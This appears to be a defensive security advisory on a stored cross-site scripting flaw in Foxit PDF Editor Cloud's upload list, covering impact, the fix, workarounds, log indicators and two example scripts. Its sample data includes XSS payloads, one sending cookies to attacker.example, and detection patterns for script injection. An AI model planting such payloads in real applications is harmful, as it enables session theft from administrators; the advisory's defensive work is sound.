CVE-2026-1591
📋 TL;DR
Foxit PDF Editor Cloud (pdfonline.foxit.com) has a stored cross-site scripting vulnerability in its file upload feature. A username embedded in an uploaded file is not escaped before it is rendered in the upload list, so an attacker who can upload a file can plant arbitrary JavaScript that runs in the browser of any administrator who later views that list. The flaw affects the hosted service pdfonline.foxit.com before February 3, 2026.
💻 Affected Systems
- Foxit PDF Editor Cloud (pdfonline)
📦 What is this software?
Foxit PDF Editor Cloud (pdfonline.foxit.com) is Foxit's browser-based, hosted PDF editing service. Because it is operated by Foxit, the fix is deployed on the service side rather than installed by customers.
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal an administrator's session cookie or tokens, perform actions in the administrator's browser session, deface the application, or redirect administrators to attacker-controlled sites, potentially leading to complete account compromise and data theft. Because the payload is stored, it fires for every administrator who opens the upload list, not just once.
Likely Case
Attackers would typically use this to steal session cookies or credentials from administrators viewing the upload list, then reuse them to gain unauthorized administrative access to the PDF Editor Cloud platform.
If Mitigated
With output encoding applied wherever the username is written into the page (HTML entity encoding for element content, attribute encoding inside attributes), the stored payload is displayed as literal text instead of being parsed as markup. Input validation on the username is a useful second layer, but it is not a substitute for encoding at the point of output.
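The vulnerable pattern and its hardened form, as an added example that is not Foxit's code: the row template, the function names and the sample upload are assumptions for illustration, since the page does not show the real application.

```javascript
// Added example (not Foxit's code): how a stored XSS like CVE-2026-1591 arises
// when an attacker-controlled "username" field is concatenated into HTML, and
// how contextual output encoding neutralises it. Field and function names are
// assumptions for illustration.

// Escape the five characters that matter in HTML element content and in
// double-quoted attribute values. '&' must be replaced first, otherwise the
// entities produced by the later replacements would be re-encoded.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable pattern: untrusted metadata dropped straight into markup, in
// both an attribute context (title="...") and an element-content context.
function renderUploadRowUnsafe(upload) {
  return `<tr><td>${upload.fileName}</td><td title="${upload.username}">${upload.username}</td></tr>`;
}

// Hardened pattern: every untrusted value is encoded at the point it is
// written into the page. escapeHtml() covers both contexts used here.
function renderUploadRowSafe(upload) {
  const name = escapeHtml(upload.fileName);
  const user = escapeHtml(upload.username);
  return `<tr><td>${name}</td><td title="${user}">${user}</td></tr>`;
}

// Constructed sample: the username field carries a payload instead of a name.
const maliciousUpload = {
  fileName: "invoice.pdf",
  username: '<img src=x onerror="alert(document.cookie)">',
};

// Count tags in the rendered markup other than the <tr>/<td> the template
// itself emits; anything else was smuggled in through untrusted data.
function injectedTagCount(html) {
  const tags = html.match(/<\/?[a-z][a-z0-9]*/gi) || [];
  return tags.filter((t) => !/^<\/?(tr|td)$/i.test(t)).length;
}

function demo() {
  const unsafe = renderUploadRowUnsafe(maliciousUpload);
  const safe = renderUploadRowSafe(maliciousUpload);
  return {
    unsafeInjectedTags: injectedTagCount(unsafe), // 2: once in title, once in content
    safeInjectedTags: injectedTagCount(safe),     // 0: the payload is inert text
    safeRow: safe,
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

The unsafe renderer lets the payload break out of the `title` attribute and also lands a live `<img>` element in the cell; the safe renderer shows the administrator exactly what the attacker typed, angle brackets included, which is also what a fixed service should display during verification.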
🎯 Exploit Status
Exploitation requires the ability to upload a file and an administrator subsequently opening the upload list; no interaction beyond viewing the page is needed. Once the injection point is known, the attack is straightforward: craft a file whose embedded username field carries the payload and upload it.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 2026-02-03 or later
Vendor Advisory: https://www.foxit.com/support/security-bulletins.html
Restart Required: No
Instructions:
1. Access the Foxit PDF Editor Cloud admin panel.
2. Check the current version in system settings.
3. If it is dated before 2026-02-03, contact Foxit support for the update.
4. Verify the version is 2026-02-03 or later.
🔧 Temporary Workarounds
These apply to whoever operates the web application; customers of the hosted service cannot set response headers or disable features themselves, and are limited to the measures under "If You Can't Patch" until Foxit's fix is live.
Disable file uploads
Temporarily disable the file upload feature until patched.
Content Security Policy
Implement a strict Content-Security-Policy header that disallows inline script, which blocks the simplest `<script>` and `on*=` payloads:
Content-Security-Policy: script-src 'self'
Roll it out first as Content-Security-Policy-Report-Only, because the same policy blocks any inline scripts the application itself relies on. CSP limits what an injected payload can execute; it does not remove the injection and does not stop markup-only attacks such as injected links or forms.
🧯 If You Can't Patch
- Implement WAF rules to block XSS payloads in file upload metadata, and treat them as a speed bump rather than a fix: signature matching is routinely bypassed with encoded or fragmented payloads
- Restrict file upload permissions to trusted users only, and monitor upload logs for the indicators listed under Detection & Monitoring
- Until the fix is confirmed, review the upload list from an account without administrative privileges, since the payload runs with whatever rights the viewer's session has
🔍 How to Verify
Check if Vulnerable:
Check whether your pdfonline.foxit.com instance reports a release date before 2026-02-03 in the admin panel or system information page.
Check Version:
Check the admin panel's system information, or ask Foxit support which release your instance is running.
Verify Fix Applied:
Confirm the version is 2026-02-03 or later, then upload a test file from a non-production account whose username field carries an inert markup canary such as <b>canary</b> and view the upload list: a fixed service shows the literal text, angle brackets included, rather than rendering it in bold. Use only inert canaries for this check; never upload payloads that execute or exfiltrate data.
📡 Detection & Monitoring
Log Indicators:
- Upload events whose username (or other embedded metadata) field contains markup: `<script`, `<img`, `<svg`, `<iframe`, `javascript:` or an `on*=` event handler, including percent- or entity-encoded forms such as `%3Cscript` or `&lt;script`
- Several uploads in a short window from one account whose metadata differs only in the payload, which is what probing for the injection point looks like
- Failed upload attempts with unusual special characters in metadata fields
Network Indicators:
- HTTP upload requests (multipart or JSON bodies) carrying script payloads in the username or other metadata parameters
- Requests from administrators' browsers to unfamiliar external domains shortly after loading the upload list, which is what cookie exfiltration from a stored payload looks like
SIEM Query (Splunk-style example; adjust the source and field names to what your instance actually emits):
source="pdfonline" AND event="file_upload" AND (message="*<script*" OR message="*javascript:*" OR message="*onerror=*" OR message="*onload=*" OR message="*%3Cscript*" OR message="*&lt;script*")
A literal match on `<script>` alone misses payloads built from other tags or event handlers and misses encoded variants, so match against the decoded field where the SIEM supports it.
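The indicators above, applied to upload events by a small scanner. This is an added example and not Foxit's or any vendor's detection content; the key=value log format, the field names and the sample lines are assumptions constructed for this example, so adapt the parser to whatever pdfonline actually emits.

```javascript
// Added example (not Foxit's or any vendor's detection content): scans
// upload-event log lines for the XSS indicators listed in this advisory,
// after undoing the encodings a plain "*<script>*" match would miss.
// Log format, field names and sample lines are constructed assumptions.

// Constructed sample lines; in the scenario described here only the
// "username" field is attacker-controlled.
const sampleLogLines = [
  'ts=2026-01-20T10:01:02Z source=pdfonline event=file_upload user=alice file="report.pdf" username="Alice Smith"',
  'ts=2026-01-20T10:02:11Z source=pdfonline event=file_upload user=bob file="a.pdf" username="<script>fetch(\'https://attacker.example/?c=\'+document.cookie)</script>"',
  'ts=2026-01-20T10:03:45Z source=pdfonline event=file_upload user=carol file="b.pdf" username="%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E"',
  'ts=2026-01-20T10:04:00Z source=pdfonline event=file_upload user=dave file="c.pdf" username="O\'Brien &amp; Sons"',
  'ts=2026-01-20T10:05:00Z source=pdfonline event=file_upload user=eve file="d.pdf" username="<a href=javascript:alert(1)>x</a>"',
];

// Parse one key=value line into an object. Quoted values may contain spaces
// and '=' characters; the whole quoted value is consumed in one match.
function parseLogLine(line) {
  const fields = {};
  const re = /(\w+)=(?:"([^"]*)"|(\S+))/g;
  let m;
  while ((m = re.exec(line)) !== null) {
    fields[m[1]] = m[2] !== undefined ? m[2] : m[3];
  }
  return fields;
}

// Undo the encodings an attacker is likely to use to slip past a literal
// signature: percent-encoding and the common HTML entities. Lower-case the
// result so the indicator patterns can stay simple.
function normalize(value) {
  let s = value;
  try {
    s = decodeURIComponent(s);
  } catch (_) {
    // Malformed percent-encoding: keep the raw value rather than drop the event.
  }
  return s
    .replace(/&lt;/gi, "<")
    .replace(/&gt;/gi, ">")
    .replace(/&quot;/gi, '"')
    .replace(/&#39;|&#x27;/gi, "'")
    .replace(/&amp;/gi, "&")
    .toLowerCase();
}

// Heuristic indicators, in priority order. Tune against real usernames
// before alerting on them; "event_handler" in particular is a broad match.
const INDICATORS = [
  ["script_tag", /<\s*script\b/],
  ["javascript_uri", /javascript\s*:/],
  ["html_tag", /<\s*(img|svg|iframe|object|embed|body|a|input)\b/],
  ["event_handler", /\bon[a-z]+\s*=/],
];

// Return one hit per suspicious upload event: who uploaded, the raw field,
// and which indicators fired on the decoded value.
function scanUploadEvents(lines) {
  const hits = [];
  for (const line of lines) {
    const f = parseLogLine(line);
    if (f.event !== "file_upload" || f.username === undefined) continue;
    const value = normalize(f.username);
    const indicators = INDICATORS.filter(([, re]) => re.test(value)).map(([name]) => name);
    if (indicators.length > 0) {
      hits.push({ user: f.user, username: f.username, indicators });
    }
  }
  return hits;
}

console.log(JSON.stringify(scanUploadEvents(sampleLogLines), null, 2));
```

On the constructed sample, the percent-encoded `<img ... onerror=...>` and the `javascript:` link are caught only because the value is decoded before matching; the benign "O'Brien &amp; Sons" decodes to plain text and is not flagged.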